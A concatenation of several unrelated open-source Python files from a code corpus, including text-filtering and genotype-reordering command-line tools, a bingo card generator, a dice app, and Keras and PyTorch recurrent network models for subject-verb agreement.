info_line = "# {} replacements read from {}.\n"
info_line = info_line.format(len(options.reps), options.replacements)
sys.stderr.write(info_line)
options.rep_counter = 0
options.not_rep_counter = 0
options.n_line_match = 0
options.n_line_no_match = 0
replacer = Replacer()
start_lines = []
kwargs = {}
# always read the first 666 lines into memory
for ip_line in options.ipstream:
if len(start_lines) < 666:
start_lines.append(ip_line)
if len(start_lines) == 666:
break
    # check what the input looks like to define the delimiters
kwargs = update_delimiters(options=options, start_lines=start_lines)
# process the lines
is_first_line = True
for ip in (start_lines, options.ipstream):
for line in ip:
ok = replacer.replace_line(kwargs,
ip_line=line,
is_header=is_first_line)
is_first_line = False
if not ok:
finish(False, kwargs)
finish(True, kwargs)
if __name__ == '__main__':
main()
``` |
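The --column help text above describes the whole-line mode: targets are replaced in alphabetical order and text that has already been substituted is never replaced again. A toy re-implementation of just that rule, separate from ezreplace.py, using the same marker trick as Replacer.replace_line:

```python
# Hedged sketch: non-recursive whole-line replacement, replacements applied alphabetically.
def replace_once(line, reps):
    pieces = [line]                       # str pieces are still replaceable
    for old in sorted(reps):
        out = []
        for piece in pieces:
            if isinstance(piece, str) and old in piece:
                parts = piece.split(old)
                for part in parts[:-1]:
                    out.extend([part, (old,)])   # tuple marks a finished replacement
                out.append(parts[-1])
            else:
                out.append(piece)
        pieces = out
    return ''.join(p if isinstance(p, str) else reps[p[0]] for p in pieces)

print(replace_once('dog lion cat cat tennis',
                   {'cat': 'tennis', 'tennis': 'football'}))
# -> dog lion tennis tennis football
```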
{
"source": "13am/filter_lines",
"score": 4
} |
#### File: filter_lines/src/filter_lines.py
```python
from optparse import OptionParser
import sys
import operator
import os
def parse_options():
userinfo = '''
FILTER LINES
Examples:
A. Filter the file "f1.txt" by keeping all lines which contain any of
the words listed in the file "words.txt". Assume the file to be filtered
contains data in columns separated by spaces. Only use the values in the
first column of "f1.txt" to look for matches.
> filter_lines.py --in f1.txt --keep words.txt --sep space --column 1 --out filtered_f1.txt
    B. Filter a file by values in columns. Assume the columns are named on the
first (header) line of the input file. Output the header line and lines
where either the "weight" column has a value greater than 13, or the value
of the "taste" column is "good", or both.
> filter_lines.py --in f1.txt --filters "weight>13,taste=good" --sep space --column 1 --out filtered_f1.txt
C. As above but now keep only lines where the "weight" column has a value
greater than 13 and the value of the "taste" column is "good".
> filter_lines.py --match-all --in f1.txt --filters "weight>13,taste=good" --sep space --column 1 --out filtered_f1.txt
'''
parser = OptionParser(usage=userinfo)
parser.add_option('--in', type='string',
action='store', dest='infilename', default=False,
help='The file to filter. If not specified, input \
is read from STDIN')
parser.add_option('--out', type='string',
action='store', dest='outfilename', default=False,
help='Name for the file where the target lines are written. \
If not specified, output is written to STDOUT')
parser.add_option('--keep', type='string',
action='store', dest='keep', default=False,
help='Keep lines containing a value listed in this file.')
parser.add_option('--remove', type='string',
action='store', dest='remove', default=False,
help='Remove lines containing a value listed in this file.')
parser.add_option('--column',
action='store', dest='column',
help='Specify the column to be searched for the values when using'
' --keep or --remove.'
' The leftmost is column 1 etc.'
' Multiple columns can be given by separating the column indexes'
' with a comma,'
' e.g. --column 1,2,5 would only search in the first,'
' second, and fifth columns and'
' ignore matches elsewhere.')
parser.add_option('--match-all',
action='store_true', dest='match_all', default=False,
help='If multiple fields specified with --column or --filters,'
' require that all columns produce a match'
' in order for the line itself to be counted as a match (i.e. use logical AND to join the conditions).'
' Otherwise by default a match with any condition is sufficient to produce a match (a logical OR is used).')
parser.add_option('--filter-columns',
action='store_true', dest='by_col', default=False,
help='Filter by column names (instead of values on rows) when using'
' --keep or --remove.')
parser.add_option('--excluded-out', type='string',
action='store', dest='outfilename_ex', default=False,
help='Name for the file where the excluded lines are written.'
' If not specified, they are discarded.')
parser.add_option('--header', action='store_true', dest='header', default=False,
help='If specified, do not filter the first line of the file.')
parser.add_option('--sep', type='string',
action='store', dest='sep', default='tab',
help='Use this as field separator.'
' The default value is tab.'
' Possible values are "tab", "space", "whitespace", or any string'
' such as "this script is awesome" or ";" enclosed in quotes.'
' If you use the'
' "whitespace" keyword as the separator, continuous stretches of'
' any whitespace'
' characters will be used as field separators in the input and'
' the output will be'
' separated by single spaces.')
parser.add_option('--filters',
dest='filters',
action='store',
default=False,
help='Filter input lines by values in named columns.'
' E.g. --filters "chrom=1,pos>3,pos<500,chrom!=MT".'
' Recognizes the operators ">", "<", "=", and "!=".')
parser.add_option('--ignore-case',
dest='ignore_case',
action='store_true',
default=False,
help='When using --keep or --remove: ignore case when '
'comparing letters, e.g. match "cat" to "CAT"')
parser.add_option('--debug',
dest='debug',
action='store_true',
default=False,
help='Turn debugging reports on')
parser.add_option('--partial-match',
dest='partial_match',
action='store_true',
default=False,
help='When using --filters: allow partial matches to column names'
' (if they are unique)')
parser.add_option('--substring-match',
dest='substring_match',
action='store_true',
default=False,
help='When using --keep or --remove: match if one and only one of the keywords'
' is a substring of the target.')
parser.add_option('--range',
dest='range',
action='store_true',
default=False,
help='--keep or --remove files contain genomic ranges'
' in the tabix format. E.g. "1:400-50000", or "1".')
parser.add_option('--chr-index',
dest='chr_index',
action='store',
type='int',
default=-666,
help='Index for the chromosome column. Used when'
' specifying --range.')
parser.add_option('--pos-index',
dest='pos_index',
action='store',
type='int',
default=-666,
help='Index for the base pair position column.'
' Used when specifying --range.')
parser.add_option('--assume-chr',
dest='assume_chr',
action='store',
default=False,
help='Use this as the chromosome code in the input.'
' Used when specifying --range.')
(options, args) = parser.parse_args()
if not (options.keep or options.remove or options.filters):
print_error('Please specify either --keep, --remove, or --filters')
sys.exit(0)
return options
def print_error(msg, vals=[]):
m = 'Error: ' + msg.format(*vals).strip() + '\n'
sys.stderr.write(m)
def print_debug(msg, vals=[]):
m = 'Debug: ' + msg.format(*vals).strip() + '\n'
sys.stderr.write(m)
def get_targets(options):
filename = options.keep
if filename is False:
filename = options.remove
try:
input = open(filename, 'r')
except IOError:
        print_error('The file {} was not found.', vals=[filename])
sys.exit(0)
targets = {}
if options.range:
for line in input:
if ':' in line:
chrom = line.split(':')[0]
start = int(line.split(':')[1].split('-')[0])
end = int(line.split(':')[1].split('-')[1])
else:
chrom = line.strip()
start = None
end = None
            if start is not None:
                assert start <= end
try:
targets[chrom].append((start, end))
except KeyError:
targets[chrom] = [(start, end)]
for chrom in targets:
targets[chrom].sort(key=lambda x: x[0]) # sort by start position
else:
for line in input:
line = line.strip()
if options.ignore_case:
line = line.lower()
targets[line] = 0
input.close()
return targets
def get_indexes(header_line, keys, options):
indexes = {}
header = split_line(header_line, options)
for i in enumerate(header):
for k in keys:
if options.partial_match:
match = k in i[1]
else:
match = k == i[1]
if match:
try:
indexes[k].append(i[0])
except KeyError:
indexes[k] = [i[0]]
unique_indexes = {}
for k, i in indexes.items():
u = set(i)
if len(u) > 1:
print_error('{} unequal matches for filter "{}"', vals=[len(u), k])
sys.exit(0)
else:
unique_indexes[k] = list(u)[0]
return unique_indexes
def float_or_return(i):
try:
return float(i)
except ValueError:
return i
class Filters:
operators = {'!=': operator.ne,
'=': operator.eq,
'<': operator.lt,
'>': operator.gt}
formatters = {'!=': float_or_return,
'=': float_or_return,
'<': float,
'>': float}
def build_filters(filters):
raw_filters = filters.split(',')
ready_filters = {}
for f in Filters.operators.keys():
ready_filters[f] = {}
for f in ready_filters.keys():
for r in raw_filters:
if f == '=' and '!=' in r:
continue
if f in r:
filter_key = r.split(f)[0]
filter_value = r.split(f)[1]
try:
ready_filters[f][filter_key].append(filter_value)
except KeyError:
ready_filters[f][filter_key] = [filter_value]
for f, targets in ready_filters.items():
for k, v in targets.items():
sys.stderr.write('# filter: {} {} {}\n'.format(k, f, v))
return ready_filters
def match_by_filters(targets, line, options):
ln = split_line(line, options)
found_set = set()
# options.filters: dict of dicts
# e.g. {filter_operator:{line_index:[target_values]}}
for filter in iter(options.filters):
fmter = Filters.formatters[filter]
oprtor = Filters.operators[filter]
cols = options.filters[filter].items()
for i, vals in cols:
i = ln[i]
for v in vals:
match = oprtor(fmter(i), fmter(v))
if match:
found_set.add(True)
else:
found_set.add(False)
if options.debug:
msg = '"{}" "{}" "{}" {}'
print_debug(msg, vals=(i, filter, v, match))
return found_set
def match_by_keyword(targets, line, options):
last = None
last_found = None
ln = split_line(line, options)
found_set = set()
cols = options.column
if cols is None:
cols = range(0, len(ln))
for column in cols:
try:
t = ln[column].strip()
if options.ignore_case:
t = t.lower()
except IndexError as e:
raise e
if t != last:
last = t
if options.substring_match is False:
last_found = last in targets
else:
n_matches = 0
for k in targets.keys():
if k in last:
n_matches += 1
last_found = (n_matches == 1)
found_set.add(last_found)
return found_set
def match_by_range(targets, line, options):
ln = split_line(line, options)
if options.assume_chr is False:
chrom = ln[options.chr_index]
else:
chrom = options.assume_chr
pos = int(ln[options.pos_index])
if chrom in targets:
for r in targets[chrom]:
if r[0] is None or r[1] is None:
return set([True])
if r[0] > pos:
break
elif r[1] >= pos:
return set([True])
else:
continue
return set([False])
def exit(*filehandles):
for f in filehandles:
if f is None:
continue
if f in [sys.stderr, sys.stdout, sys.stdin]:
continue
try:
f.close()
except:
pass
sys.exit(0)
def split_line(line, options):
return line.strip('\n').split(options.sep)
def main():
options = parse_options()
infilename = options.infilename
header = options.header
outfilename = options.outfilename
keep = options.keep
remove = options.remove
# make sure keep / remove are existing files
for i in (keep, remove):
if i is not False:
if os.path.isfile(i) is False:
msg = 'The file "{}" does not exist or is not readable.'
print_error(msg, vals=[i])
exit()
# parse the column notation
if options.column is not None:
options.column = [
int(i.strip()) - 1 for i in options.column.split(',')]
# move the column indexes to 0-based indexing
if options.pos_index is not False:
options.pos_index -= 1
if options.chr_index is not False:
options.chr_index -= 1
# set the delimiters
sep = options.sep
op_sep = sep
if sep == 'tab':
sep = '\t'
op_sep = '\t'
if sep == 'space':
sep = ' '
op_sep = ' '
if sep == 'whitespace':
sep = None
op_sep = ' '
options.sep = sep
linecounter = 0
n_removed = 0
n_kept = 0
input = None
if infilename is False:
input = sys.stdin
infilename = 'STDIN'
else:
try:
input = open(infilename, 'r')
except IOError:
print_error('File {} was not found.', vals=[infilename])
sys.exit(0)
output = None
if outfilename is False:
output = sys.stdout
else:
try:
output = open(outfilename, 'w')
except:
print_error('File {} could not be opened for writing output.',
vals=[outfilename])
exit(input)
output_ex = None
if options.outfilename_ex is not False:
try:
output_ex = open(options.outfilename_ex, 'w')
except:
print_error('File {} could not be opened for writing output.',
vals=[options.outfilename_ex])
exit(input, output, output_ex)
# handle the header
header_line = None
if header is True or options.by_col or options.filters is not False:
linecounter += 1
n_kept += 1
header_line = input.readline()
# if specifying --keep or --remove, read the corresponding files
targets = None
if options.filters is False:
targets = get_targets(options)
if targets is None:
sys.exit(0)
else:
# make the filter dict using column names as keys
options.filters = build_filters(options.filters)
all_filters = []
for i in options.filters:
all_filters += options.filters[i].keys()
# make sure that all specified column names are in the header
filter_indexes = get_indexes(header_line, all_filters, options)
for k in all_filters:
if k not in filter_indexes:
msg1 = 'The --filters key {} was not found on the header line.'.format(
k)
msg2 = 'Maybe you forgot to specify the correct --sep?'
print_error(msg1 + '\n' + msg2, vals=[k])
exit(input, output, output_ex)
# convert the keys from column names to column indexes
filters = {}
for f in iter(options.filters):
filters[f] = {}
for k, v in options.filters[f].items():
i = filter_indexes[k]
filters[f][i] = v
options.filters = filters
target_cols = []
new_header_line = None
if options.by_col:
cols = split_line(header_line, options)
for i in range(len(cols)):
found = cols[i].strip() in targets
if (found and keep is not False) or (not found and remove is not False):
target_cols.append(i)
new_header_line = op_sep.join([cols[i] for i in target_cols])
do_keep = keep is not False or options.filters is not False
do_remove = remove is not False and options.filters is False
# choose the matching function
if options.filters is not False:
matching_fun = match_by_filters
elif options.range:
matching_fun = match_by_range
else:
matching_fun = match_by_keyword
# write the header to the output first
if options.by_col:
output.write(new_header_line + '\n')
elif options.header or options.filters is not False:
output.write(header_line.rstrip('\n') + '\n')
# then handle the rest of the input lines
expected_col_n = None
if header_line is not None:
expected_col_n = len(split_line(header_line, options))
for line in input:
linecounter += 1
if len(line.strip()) == 0:
continue
ln = split_line(line, options)
if expected_col_n is None:
expected_col_n = len(ln)
else:
if len(ln) != expected_col_n:
msg = 'error: line {} had {} columns but the previous lines had {}.\n'
msg = msg + 'This program only works if all of the lines in the input '
msg = msg + 'have the same number of columns.\n'
msg = msg + 'Maybe you are not using the correct --sep?'
vals = (linecounter, len(ln), expected_col_n)
print_error(msg, vals=vals)
exit(input, output, output_ex)
if options.by_col:
n_kept += 1
l = [ln[i] for i in target_cols]
output.write(op_sep.join(l) + '\n')
if options.outfilename_ex != False:
l = [ln[i] for i in range(0, len(ln)) if i not in target_cols]
output_ex.write(op_sep.join(l) + '\n')
else:
try:
found_set = matching_fun(targets, line, options)
found = False
if True in found_set:
if options.match_all:
if False not in found_set:
found = True
else:
found = True
if (found and do_keep) or (not found and do_remove):
output.write(line)
n_kept += 1
else:
if options.outfilename_ex != False:
output_ex.write(line)
n_removed += 1
except IndexError:
msg = 'error: the file {} has only {} columns on line {},' \
' which is less than the minimum amount of' \
' columns implied by the --column value'
vals = (infilename, len(ln), linecounter)
print_error(msg + '\n' + line, vals=vals)
exit(input, output, output_ex)
# print final info
if do_remove:
action = 'removed'
n = n_removed
else:
action = 'kept'
n = n_kept
msg = 'done, {} {} of the {} lines in {}'
vals = (action, n, linecounter, infilename)
sys.stderr.write(msg.format(*vals) + '\n')
exit(input, output, output_ex)
if __name__ == '__main__':
main()
``` |
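The Filters class pairs each operator symbol with a comparison function and a formatter that falls back to string comparison when a value is not numeric. A compact sketch of that evaluation for a single row, separate from the script itself:

```python
# Hedged sketch: evaluate a --filters expression against one row of named columns.
import operator

ops = {'!=': operator.ne, '=': operator.eq, '<': operator.lt, '>': operator.gt}

def line_matches(row, filters, match_all=False):
    # row: dict of column name -> string value; filters: e.g. "weight>13,taste=good"
    results = []
    for clause in filters.split(','):
        for symbol in ('!=', '>', '<', '='):         # check '!=' before '='
            if symbol in clause:
                col, target = clause.split(symbol, 1)
                value = row[col]
                try:
                    value, target = float(value), float(target)
                except ValueError:
                    pass                              # non-numeric: compare as strings
                results.append(ops[symbol](value, target))
                break
    return all(results) if match_all else any(results)

print(line_matches({'weight': '14', 'taste': 'bad'}, 'weight>13,taste=good'))        # True
print(line_matches({'weight': '14', 'taste': 'bad'}, 'weight>13,taste=good', True))  # False
```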
{
"source": "13am/order_genfile",
"score": 3
} |
#### File: order_genfile/src/order_genfile.py
```python
from argparse import ArgumentParser
import sys
import gzip
import numpy
MAX_SNPS_IN_BUFFER = 6
def parse_options():
parser = ArgumentParser()
parser.add_argument('--gen-in',
dest='genfile_in',
default=None,
help='Name of the input .gen file. Leave out if'
' you want to read the input from stdin.')
parser.add_argument('--gen-out',
dest='genfile_out',
default=None,
help='Name of the output .gen file. Leave out if'
' you want to write the output to stdout.')
parser.add_argument('--sample-in',
dest='sample_in',
default=None,
help='Name of the input .sample file.')
parser.add_argument('--sample-out',
dest='sample_out',
default=None,
help='Name of the output .sample file.')
parser.add_argument('--order',
dest='order',
default=None,
help='Specify the order of the output data.'
' ID_1 ID_2 per line.'
' First line -> first 3 probabilities etc.')
parser.add_argument('--model-sample',
dest='model_sample',
default=None,
help='Match the order of this sample file'
' when outputting data.')
parser.add_argument('--allow-subsetting',
action='store_true',
dest='allow_subsetting',
default=False,
help='Exclude any samples found in the input sample '
'file but not in the file order or model sample '
'files.')
options = parser.parse_args()
return options
def print_finish_and_stop():
sys.stderr.write('\nProgram finished with success.\n')
sys.exit()
def print_error_and_stop(msg):
main_msg = '\nError: {}\nTerminating the program because of the error.\n'
sys.stderr.write(main_msg.format(msg))
sys.exit()
def read_gen_lines(lines, n_samples):
# make the numpy array, verify all lines have the same number of columns
array = numpy.array(([i.strip().split(' ') for i in lines]))
n = len(array[0])
for i in array:
if len(i) != n:
print_error_and_stop('The number of genotypes in the input'
' is not constant.')
# the line may or may not have the chromosome code
i_genotypes = 5
if len(array[0]) % 3 == 0:
i_genotypes = 6
non_genotype_cols = array[..., :i_genotypes]
genotype_cols = array[..., i_genotypes:]
# always make sure the number of probabilities is 3 times N(of samples)
if len(genotype_cols[0]) != 3 * n_samples:
msg = ('Line for the SNP \n"{}"\ndid not have 3*{}'
' genotype probabilities')
print_error_and_stop(msg.format(' '.join(non_genotype_cols),
n_samples))
# use numpy to reshape the genotype columns
# now they are in [variant][probabilities]
# change into [variant][sample][probabilities]
n_snps = len(lines)
genotypes = genotype_cols.reshape(n_snps, n_samples, 3)
return non_genotype_cols, genotypes
def read_sample_order(fname, is_sample_file=None):
input_sample_order = []
with open(fname, 'r') as ip:
for line in ip.readlines():
ln = line.strip().split()
sample_id = ' '.join(ln[:2])
input_sample_order += [sample_id]
if is_sample_file:
input_sample_order = input_sample_order[2:]
# fail if duplicates are found
if len({i: i for i in input_sample_order}) != len(input_sample_order):
msg = 'The file "{}" contains duplicates.'
print_error_and_stop(msg.format(fname))
return tuple(input_sample_order)
def _write_lines(op, lines, n_samples_input, index_array):
snp_info_lines, genotypes = read_gen_lines(lines, n_samples_input)
new_indexing = numpy.ix_(range(0, len(genotypes)),
index_array)
ordered_genotypes = genotypes[new_indexing]
ordered_genotypes = ordered_genotypes.reshape(len(lines),
len(index_array) * 3)
op_data = numpy.column_stack((snp_info_lines,
ordered_genotypes))
op_lines = [' '.join(i) for i in op_data]
op.write('\n'.join([i for i in op_lines]) + '\n')
return len(op_lines)
def write_output(ip, op, n_samples_input, index_array):
counter = 0
buffered_lines = []
for line in ip:
buffered_lines.append(line)
if len(buffered_lines) == MAX_SNPS_IN_BUFFER:
counter += _write_lines(op, buffered_lines,
n_samples_input, index_array)
buffered_lines = []
if len(buffered_lines) > 0:
counter += _write_lines(op, buffered_lines,
n_samples_input, index_array)
return counter
def main():
options = parse_options()
# read the input sample order
input_sample_order = read_sample_order(options.sample_in,
is_sample_file=True)
# read the output sample order
new_sample_order_fname = options.model_sample
is_sample_file = True
if options.model_sample is None:
        new_sample_order_fname = options.order
is_sample_file = False
new_sample_order = read_sample_order(new_sample_order_fname,
is_sample_file=is_sample_file)
new_sample_dict = {v: i for i, v in enumerate(new_sample_order)}
# make a dict from old -> new indexes for the genotypes
old_to_new_index = {}
for i_old, sample_id in enumerate(input_sample_order):
try:
i_new = new_sample_dict[sample_id]
old_to_new_index[i_old] = i_new
except KeyError:
if options.allow_subsetting:
pass
else:
msg = 'The sample "{}" was not in listed in "{}"' \
' and the --allow-subsetting flag was not' \
' in use.'
msg = msg.format(sample_id,
new_sample_order_fname)
print_error_and_stop(msg)
# write the new sample file
if options.sample_out is None:
print_error_and_stop('Please specify --sample-out.')
with open(options.sample_out, 'w') as op:
with open(options.sample_in, 'r') as ip:
old_lines = ip.readlines()
new_lines = [None for i in new_sample_order]
for i_old, l in enumerate(old_lines[2:]):
try:
i_new = old_to_new_index[i_old]
new_lines[i_new] = l
except KeyError:
continue
new_lines = old_lines[:2] + new_lines
op.write('\n'.join([i.strip() for i in new_lines]) + '\n')
# convert the dict to an index array
new_to_old_index = {i_new: i_old for i_old, i_new in
old_to_new_index.items()}
index_array = [None for i in new_to_old_index]
for new_index, old_index in new_to_old_index.items():
index_array[new_index] = old_index
if None in index_array:
print_error_and_stop('Error in making the index array')
index_array = tuple(index_array)
# figure out where and how to read the input genfile
if options.genfile_in is None:
ip = sys.stdin
elif options.genfile_in.endswith('.gz'):
ip = gzip.open(options.genfile_in, 'rb')
else:
ip = open(options.genfile_in, 'r')
# set output destination
if options.genfile_out is None:
op = sys.stdout
else:
op = open(options.genfile_out, 'w')
n_samples_input = len(input_sample_order)
n_written = write_output(ip, op, n_samples_input, index_array)
op.flush()
opname = 'STDOUT'
if op is not sys.stdout:
op.close()
opname = options.genfile_out
    msg = '\nWrote {} samples and {} genotype lines to "{}" and "{}"\n'
msg = msg.format(len(index_array), n_written,
options.sample_out, opname)
sys.stderr.write(msg)
print_finish_and_stop()
if __name__ == '__main__':
main()
``` |
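write_output relies on reshaping each .gen line's probabilities into a [SNP][sample][3] array and then reordering the sample axis with numpy.ix_. A toy example, not from the repository, showing that reorder on two SNPs and three samples:

```python
# Hedged toy example: reorder per-sample genotype triplets with reshape + numpy.ix_.
import numpy

n_snps, n_samples = 2, 3
probs = numpy.arange(n_snps * n_samples * 3).reshape(n_snps, n_samples * 3)
genotypes = probs.reshape(n_snps, n_samples, 3)      # [snp][sample][3 probabilities]

index_array = (2, 0, 1)                              # new order: old sample 2 first, etc.
reordered = genotypes[numpy.ix_(range(n_snps), index_array)]
print(reordered.reshape(n_snps, n_samples * 3))
# [[ 6  7  8  0  1  2  3  4  5]
#  [15 16 17  9 10 11 12 13 14]]
```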
{
"source": "13B-MSP/bingo_game",
"score": 3
} |
#### File: bingo/factories/bingo_card_factory.py
```python
import random
from typing import List
from ..models.bingo_card import BingoCard
def _transpose(ls: List[List[int]]) -> List[List[int]]:
"""
Helper function that transposes a 2d list of integers
"""
list_len = len(ls)
return [[ls[j][i] for j in range(list_len)] for i in range(list_len)]
class BingoCardFactory:
"""
Factory that creates bingo cards with certain min-, max- and size parameters
"""
def __init__(self, min_num: int, max_num: int, size: int) -> None:
"""
BingoCardFactory ctor
"""
self._min_num = min_num
self._max_num = max_num
self._size = size
def _generate_bingo_field(self) -> List[List[int]]:
"""
Generate a new bingo field, to then assign to a BingoCard
"""
col_nr_range = int(self._max_num / self._size)
field: List[List[int]] = [
random.sample(range(n, n+col_nr_range), k=self._size)
for n in range(self._min_num, self._max_num+1, col_nr_range)
]
middle = int(self._size / 2)
field[middle][middle] = -1
return _transpose(field)
def create(self) -> BingoCard:
"""
Create a new BingoCard
"""
return BingoCard(self._generate_bingo_field())
# This is a 'standard' 5 x 5 bingo card factory with maximum nr of 75
standard_bingo_card_factory = BingoCardFactory(1, 75, 5)
def create_standard_bingo_card() -> BingoCard:
"""
Create a standard BingoCard using the standard_bingo_card_factory
"""
return standard_bingo_card_factory.create()
``` |
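A small usage sketch, not part of the module: the pre-transpose field has one 15-number band per row (1-15, 16-30, ... for the standard 1-75 card), the centre cell becomes the -1 free square, and _transpose turns bands into columns. The printed values are illustrative since the card is random.

```python
# Hedged usage sketch; the numbers shown are one possible random outcome.
factory = BingoCardFactory(1, 75, 5)
field = factory._generate_bingo_field()
for row in field:
    print(row)
# e.g. [3, 22, 41, 52, 74]   <- one number from each 15-number band per row after the transpose
#      ...
# field[2][2] == -1          <- the free centre square
```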
{
"source": "13burn/python_fun",
"score": 3
} |
#### File: python_fun/dice/dice.py
```python
import eel
import random
from time import sleep
eel.init("front")
@eel.expose
def randGen(top):
for num in range(top):
#print in front end
eel.diceShow(random.randint(1,top))
if top > 100:
sleep(.015)
else:
sleep(.15)
eel.start("front.html")
``` |
{
"source": "13dexter/agreement_brain_nn",
"score": 3
} |
#### File: agreement_brain_nn/rnnagr/agreement_acceptor.py
```python
import random
from keras.layers.core import Dense, Activation
from keras.layers.embeddings import Embedding
from keras.models import Sequential
from keras.preprocessing import sequence
import numpy as np
import pandas as pd
from rnn_model import RNNModel
from utils import gen_inflect_from_vocab, dependency_fields
class RNNAcceptor(RNNModel):
def create_train_and_test(self, examples):
d = [[], []]
for i, s, dep in examples:
d[i].append((i, s, dep))
random.seed(1)
random.shuffle(d[0])
random.shuffle(d[1])
if self.equalize_classes:
l = min(len(d[0]), len(d[1]))
examples = d[0][:l] + d[1][:l]
else:
examples = d[0] + d[1]
random.shuffle(examples)
Y, X, deps = zip(*examples)
Y = np.asarray(Y)
X = sequence.pad_sequences(X, maxlen=self.maxlen)
n_train = int(self.prop_train * len(X))
self.X_train, self.Y_train = X[:n_train], Y[:n_train]
self.X_test, self.Y_test = X[n_train:], Y[n_train:]
self.deps_train = deps[:n_train]
self.deps_test = deps[n_train:]
def create_model(self):
self.log('Creating model')
self.model = Sequential()
self.model.add(Embedding(len(self.vocab_to_ints) + 1,
self.embedding_size,
input_length=self.maxlen))
self.model.add(self.rnn_class(output_dim=self.rnn_output_size,
input_length=self.maxlen,
unroll=True))
self.model.add(Dense(1))
self.model.add(Activation('sigmoid'))
def compile_model(self):
self.log('Compiling model')
self.model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
def evaluate(self):
return self.model.evaluate(self.X_test, self.Y_test,
batch_size=self.batch_size)
def results(self):
self.log('Processing test set')
predicted = self.model.predict_classes(self.X_test,
verbose=self.verbose).flatten()
recs = []
columns = ['correct', 'prediction', 'label'] + dependency_fields
for dep, prediction in zip(self.deps_test, predicted):
prediction = self.code_to_class[prediction]
recs.append((prediction == dep['label'], prediction,
dep['label']) +
tuple(dep[x] for x in dependency_fields))
self.test_results = pd.DataFrame(recs, columns=columns)
class CorruptAgreement(RNNAcceptor):
def __init__(self, *args, **kwargs):
RNNAcceptor.__init__(self, *args, **kwargs)
self.class_to_code = {'grammatical': 0, 'ungrammatical': 1}
self.code_to_class = {x: y for y, x in self.class_to_code.items()}
self.inflect_verb, _ = gen_inflect_from_vocab(self.vocab_file)
def process_single_dependency(self, dep):
tokens = dep['sentence'].split()
if random.random() < 0.5:
dep['label'] = 'ungrammatical'
v = int(dep['verb_index']) - 1
tokens[v] = self.inflect_verb[tokens[v]]
dep['sentence'] = ' '.join(tokens)
else:
dep['label'] = 'grammatical'
return tokens
class PredictVerbNumber(RNNAcceptor):
def __init__(self, *args, **kwargs):
RNNAcceptor.__init__(self, *args, **kwargs)
self.class_to_code = {'VBZ': 0, 'VBP': 1}
self.code_to_class = {x: y for y, x in self.class_to_code.items()}
def process_single_dependency(self, dep):
dep['label'] = dep['verb_pos']
v = int(dep['verb_index']) - 1
tokens = dep['sentence'].split()[:v]
return tokens
class PredictVerbNumberOnlyNouns(PredictVerbNumber):
def process_single_dependency(self, dep):
dep['label'] = dep['verb_pos']
tokens = dep['nouns_up_to_verb'].split()
return tokens
class PredictVerbNumberOnlyGeneralizedNouns(PredictVerbNumber):
def process_single_dependency(self, dep):
dep['label'] = dep['verb_pos']
tokens = dep['sentence'].split()[:dep['verb_index']]
poses = dep['pos_sentence'].split()[:dep['verb_index']]
tokens = [token for token, pos in zip(tokens, poses) if
pos in ['NN', 'NNS', 'NNP', 'PRP']]
        print(dep['sentence'])
        print(tokens)
        print('')
return tokens
class InflectVerb(PredictVerbNumber):
'''
Present all words up to _and including_ the verb, but withhold the number
of the verb (always present it in the singular form). Supervision is
still the original number of the verb. This task allows the system to use
the semantics of the verb to establish the dependency with its subject, so
may be easier. Conversely, this may mess up the embedding of the singular
form of the verb; one solution could be to expand the vocabulary with
number-neutral lemma forms.
'''
def __init__(self, *args, **kwargs):
super(InflectVerb, self).__init__(*args, **kwargs)
self.inflect_verb, _ = gen_inflect_from_vocab(self.vocab_file)
def process_single_dependency(self, dep):
dep['label'] = dep['verb_pos']
v = int(dep['verb_index']) - 1
tokens = dep['sentence'].split()[:v+1]
if dep['verb_pos'] == 'VBP':
tokens[v] = self.inflect_verb[tokens[v]]
return tokens
``` |
{
"source": "13dexter/eirnn_agreement",
"score": 2
} |
#### File: eirnn_agreement/eirnn/eirnn_cross.py
```python
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import numpy as np
import math
def rectify(x):
relu = nn.ReLU()
return relu(x)
# return x
class EIRnnModule(nn.Module):
def __init__(self, input_units, output_units, hidden_units, embedding_dim = 50, rectify_inputs = True, var_input = 0.01**2, var_rec = 0.15**2, dt = 0.5, tau=100):
super(EIRnnModule, self).__init__()
self.n = hidden_units
self.n_in = input_units
self.n_out = output_units
self.embedding_dim = embedding_dim
self.rectify_inputs = rectify_inputs
self.var_in = var_input
self.var_rec = var_rec
self.dt = dt
self.tau = tau
self.alpha = dt/tau
self.w_in = rectify(Variable(torch.randn(hidden_units, input_units), requires_grad = True))
self.w_rec = rectify(Variable(torch.randn(hidden_units, hidden_units), requires_grad = True))
self.w_out = rectify(Variable(torch.randn(output_units, hidden_units), requires_grad = True))
self.d_rec = Variable(torch.zeros(hidden_units, hidden_units), requires_grad=False)
self.no_self_connect = Variable(torch.ones(hidden_units, hidden_units), requires_grad=False)
for i in range(hidden_units) :
            self.no_self_connect[i][i] = 0.0  # zero the diagonal so units cannot connect to themselves
if (i < 0.8*hidden_units):
self.d_rec[i][i] = 1.0
else:
self.d_rec[i][i] = -1.0
self.reset_parameters()
def reset_parameters(self):
"""
Initialize parameters (weights) like mentioned in the paper.
"""
def forward(self, input_, states):
"""
Args:
input_: A (embedding_dim, input_units) tensor containing input
features.
states: Contains the initial cell states, which has
the size (embedding_dim, hidden_units).
Returns:
state: Tensor containing the next cell state.
"""
# Rectify to upholds Dale's
self.w_in = rectify(self.w_in)
self.w_rec = rectify(self.w_rec)
self.w_out = rectify(self.w_out)
rectified_states = rectify(states)
# rectified_states = states
# No self connections
self.w_rec = self.w_rec * self.no_self_connect
# Apply Dale's on recurrent weights
w_rec_dale = torch.mm(self.w_rec, self.d_rec)
# w_rec_dale = self.w_rec
# print('W_in : ', self.w_in)
# print('W_rec : ', self.w_rec)
# print('W_out : ', self.w_out)
# print('D_rec : ', self.d_rec)
# print('Dale : ', w_rec_dale)
hidden_update = torch.mm(w_rec_dale, rectified_states)
input_update = torch.mm(self.w_in, input_)
states = (1 - self.alpha) * states + self.alpha * (hidden_update + input_update) #+ math.sqrt(2 * self.alpha * self.var_rec) * 0.001 # guassian(0,1)
rectified_states = rectify(states)
# rectified_states = states
# [u, v] = state.size()
outputs = torch.mm(self.w_out, rectified_states)
return states, outputs
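# Note added for clarity: the module above amounts to a discretized
# excitatory/inhibitory rate-RNN update (a sketch of the intended math, not a
# statement from the original author):
#     r_t     = relu(x_t)
#     x_{t+1} = (1 - alpha) * x_t + alpha * (W_rec @ D_rec @ r_t + W_in @ u_t)
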